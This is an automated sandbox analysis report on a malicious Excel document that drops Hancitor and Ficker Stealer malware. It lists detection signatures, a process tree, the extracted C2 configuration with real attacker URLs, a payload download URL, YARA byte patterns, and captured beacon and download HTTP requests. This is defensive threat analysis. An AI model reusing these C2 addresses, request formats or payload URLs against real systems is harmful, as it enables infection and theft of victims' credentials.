Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 0722_2857746751.xls

Overview

General Information

Sample Name:0722_2857746751.xls
Analysis ID:452590
MD5:97538e922b86b2ae95625d1e11e6aaf1
SHA1:928e4d89b379bdd7c894787431a8d0b42f28a5a4
SHA256:83c9c9beaca0a147e23995b84792f56cd130ccf262147374bd1114c2ac698fee
Infos:

Most interesting Screenshot:

Detection

Ficker Stealer Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ficker Stealer
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document contains OLE streams with PE executables
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document exploit detected (process start blacklist hit)
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • imjppdmg.exe (PID: 1360 cmdline: /Migration MD5: 3716DEC1E0B88BB19968BBC2659B02A1)
    • rundll32.exe (PID: 2384 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • svchost.exe (PID: 2292 cmdline: C:\Windows\System32\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "2207_xwpi67", "C2 list": ["http://tholeferli.com/8/forum.php", "http://aidgodown.ru/8/forum.php", "http://relifleappin.ru/8/forum.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmpJoeSecurity_Ficker_Stealer_1Yara detected Ficker StealerJoe Security
    00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
      00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
        Process Memory Space: svchost.exe PID: 2292JoeSecurity_Ficker_Stealer_1Yara detected Ficker StealerJoe Security
          Process Memory Space: rundll32.exe PID: 2364JoeSecurity_HancitorYara detected HancitorJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.3.rundll32.exe.1d438c.0.raw.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
              5.3.rundll32.exe.1d438c.0.raw.unpackHancitorHancitor Payloadkevoreilly
              • 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
              5.3.rundll32.exe.1d438c.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
                5.3.rundll32.exe.1d438c.0.unpackHancitorHancitor Payloadkevoreilly
                • 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
                5.2.rundll32.exe.340000.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
                  Click to see the 1 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Suspect Svchost ActivityShow sources
                  Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2292
                  Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                  Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2404, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ProcessId: 2384
                  Sigma detected: Suspicious Svchost ProcessShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2292

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://s0lom0n.ru/7hsjfd9w4refsd.exeAvira URL Cloud: Label: malware
                  Found malware configurationShow sources
                  Source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmpMalware Configuration Extractor: Hancitor {"Campaign Id": "2207_xwpi67", "C2 list": ["http://tholeferli.com/8/forum.php", "http://aidgodown.ru/8/forum.php", "http://relifleappin.ru/8/forum.php"]}
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: pospvisis.comVirustotal: Detection: 13%Perma Link
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 0722_2857746751.xlsVirustotal: Detection: 29%Perma Link
                  Source: 0722_2857746751.xlsReversingLabs: Detection: 22%
                  Source: 5.2.rundll32.exe.340000.0.unpackAvira: Label: TR/Hijacker.Gen

                  Location Tracking:

                  barindex
                  Yara detected HancitorShow sources
                  Source: Yara matchFile source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2364, type: MEMORY
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00342CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342CD0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00342D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D17
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00342D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D98
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00342D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D78
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00342D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D55
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040BAB5 CryptUnprotectData,7_2_0040BAB5
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: c:\Star\danger\Air_Night\recei\Paragraph.pdb source: rundll32.exe, 00000005.00000002.2348584640.0000000000359000.00000002.00020000.sdmp, 0722_2857746751.xls

                  Software Vulnerabilities:

                  barindex
                  Document exploit detected (creates forbidden files)Show sources
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\532.dllJump to behavior
                  Document exploit detected (drops PE files)Show sources
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 532.dll.0.drJump to dropped file
                  Document exploit detected (process start blacklist hit)Show sources
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                  Source: global trafficDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.235.88.121:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.235.88.121:80

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49173
                  Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49173 -> 95.213.179.67:80
                  Source: TrafficSnort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49178
                  Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49178 -> 95.213.179.67:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://tholeferli.com/8/forum.php
                  Source: Malware configuration extractorURLs: http://aidgodown.ru/8/forum.php
                  Source: Malware configuration extractorURLs: http://relifleappin.ru/8/forum.php
                  May check the online IP address of the machineShow sources
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 14:11:04 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Wed, 09 Jun 2021 16:00:40 GMTETag: "60c0e5a8-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox ViewIP Address: 8.211.241.0 8.211.241.0
                  Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                  Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: GET /7hsjfd9w4refsd.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s0lom0n.ruCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
